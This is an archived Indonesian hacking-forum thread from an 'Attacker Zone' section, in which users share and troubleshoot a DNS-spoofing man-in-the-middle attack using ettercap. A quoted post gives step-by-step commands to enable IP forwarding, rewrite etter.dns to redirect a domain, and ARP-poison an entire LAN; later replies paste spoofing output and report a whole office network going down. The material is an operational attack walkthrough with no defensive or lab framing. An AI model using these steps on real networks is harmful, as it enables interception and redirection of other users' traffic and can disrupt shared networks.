+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Man In The Middle Attack (https://www.indonesianbacktrack.or.id/forum/forum-184.html)
+--- Thread: ettercap dns_spoof #PART 1 (/thread-697.html)
RE: ettercap dns_spoof #PART 1 - xsan-lahci - 02-12-2012
emang suka gitu om kalo yang GUI
saya lebih suka pake yang console kesannya angker hehehe
RE: ettercap dns_spoof #PART 1 - fake666 - 02-12-2012
wahh saya sih belum tau apa2
soalnya saya baru make bt
RE: ettercap dns_spoof #PART 1 - batanganhitam - 03-06-2012
(12-14-2011, 07:47 PM)biecyber Wrote:(12-14-2011, 07:39 PM)RR12 Wrote: @om Konspirasi : yapp kyknya gitu tuh om, klo emang ARP Spoofing nya pake ettercap maka ettercap juga akan handle IP Forwardingnya...
kalo tools kyk "arpspoof" kyknya gug nge-handle ip forwarding jadi harus set manual...
kalo memang auto ip_forward pas jalanin ettercap, pas saya jalanin command
tiba" lan 1 kantor down semua, internetan gak bisa sharing file pun gak bisa, tapi setelah saya matiin ettercapnya lan 1 kantor kembali seperti semula, apakah ini bug atau gmn ya ??? mohon pencerahanCode:ettercap -T -q -i eth0 -P dns_spoof -M arp // //
saya mirip gini juga om masalahnya.. 1 lan mati dan ketika saya menuju alamat yang mau di spoof dia gak ke spoof tapi tetep kelamat yang dituju.. tapi di terminal ada keterangan telah di spoof om.. gimana ini??
apakah mempengaruhi menggunakan switch atau hub?
RE: ettercap dns_spoof #PART 1 - Backtrack Dragon - 05-13-2012
(08-28-2011, 09:13 PM)koecroet Wrote: salam
ane mau share dns_spoof dengan ettercap nih. tp pake part boleh kan?
oke dah no bacot
1. forward dulu
Quote:#echo 1 > /proc/sys/net/ipv4/ip_forwarduntuk melihat statusnya ketik:
Quote:#cat /proc/sys/net/ipv4/ip_forwardkalo muncul angka "0" berarti blom di forward, kalo muncul angka "1" brarti udah d forward. setau ane sih gitu
2. edit file "etter.dns" untuk meracuni dns ke ip lain nih
gunakan editor text kesayangan anda. disini ane pake "nano".
Quote:#nano /usr/local/share/ettercap/etter.dns
3. lalu,
ubah nih:
dns victim ane : koecroet.web.id
yang akan forward ke ip : 117.102.253.131
Quote:################################jangan lupa di save
# microsoft sucks
# redirect it to www.linux.org
#
koecroet.web.id A 117.102.253.131
*.koecroet.web.id A 117.102.253.131
www.koecroet.web.id PTR 117.102.253.131 # Wildcards in PTR are not allowed
##########################################
4. langkah terakhir ketik:
Quote:#ettercap -T -q -i [interfaces] -P dns_spoof -M arp // //Quote:contoh: #ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
5. udah deh jalan
hasilnya nih pas ane buka http://www.koecroet.web.id
SS:
Spoiler! :
dtunggu kritik dan sarannya
http://forum.indonesianbacktrack.or.id/showthread.php?tid=706 << #PART | 2 nya om
![[Image: dnsspoof.jpg]](http://i1228.photobucket.com/albums/ee459/dekoecroet/dnsspoof.jpg)
AKu dah coba teknik ini tapi tetap tidak mengalihkan alamat koecrot, begitu juga waktu coba buka microsoft, tetap dia terbuka. masalahnya dimana yah?
RE: ettercap dns_spoof #PART 1 - xsan-lahci - 05-13-2012
ada contoh ssnya kah??
RE: ettercap dns_spoof #PART 1 - Backtrack Dragon - 05-13-2012
Udah di coba juga pakai google tapi hasilnya, Google tetap terbuka dan ettercap menghasilkan seperti ini
dns_spoof: [google.com] spoofed to [198.182.196.56]
dns_spoof: [www.google.com] spoofed to [198.182.196.56]
DHCP: [192.168.55.1] ACK : 192.168.55.230 255.255.255.0 GW 192.168.55.1 DNS 203.130.193.74
Mohon pencerahan
RE: ettercap dns_spoof #PART 1 - czeroo_cool - 11-08-2012
Ettercap GUI nya Backtrack kok Err0r ye..
Err0r nya waktu scan host
RE: ettercap dns_spoof #PART 1 - alkaaf - 11-08-2012
(05-13-2012, 12:29 AM)Backtrack Dragon Wrote: Udah di coba juga pakai google tapi hasilnya, Google tetap terbuka dan ettercap menghasilkan seperti ini
dns_spoof: [google.com] spoofed to [198.182.196.56]
dns_spoof: [www.google.com] spoofed to [198.182.196.56]
DHCP: [192.168.55.1] ACK : 192.168.55.230 255.255.255.0 GW 192.168.55.1 DNS 203.130.193.74
Mohon pencerahan
google udah make ssl di pencariannya bro, agak susah buat porting agar masuk ke server kita. :d
(11-08-2012, 06:40 AM)czeroo_cool Wrote: Ettercap GUI nya Backtrack kok Err0r ye..
Err0r nya waktu scan host
emg gitu bro, sering buffer over flow. mnding make yg CLI bro lbh cepet.
RE: ettercap dns_spoof #PART 1 - czeroo_cool - 11-08-2012
(11-08-2012, 06:46 AM)alkaaf Wrote:(05-13-2012, 12:29 AM)Backtrack Dragon Wrote: Udah di coba juga pakai google tapi hasilnya, Google tetap terbuka dan ettercap menghasilkan seperti ini
dns_spoof: [google.com] spoofed to [198.182.196.56]
dns_spoof: [www.google.com] spoofed to [198.182.196.56]
DHCP: [192.168.55.1] ACK : 192.168.55.230 255.255.255.0 GW 192.168.55.1 DNS 203.130.193.74
Mohon pencerahan
google udah make ssl di pencariannya bro, agak susah buat porting agar masuk ke server kita. :d
(11-08-2012, 06:40 AM)czeroo_cool Wrote: Ettercap GUI nya Backtrack kok Err0r ye..
Err0r nya waktu scan host
emg gitu bro, sering buffer over flow. mnding make yg CLI bro lbh cepet.
Oke mas bro.. Thanks
RE: ettercap dns_spoof #PART 1 - shozuoka - 07-16-2013
hahahaaa sipp om, dh working 100% neh
makasih makasi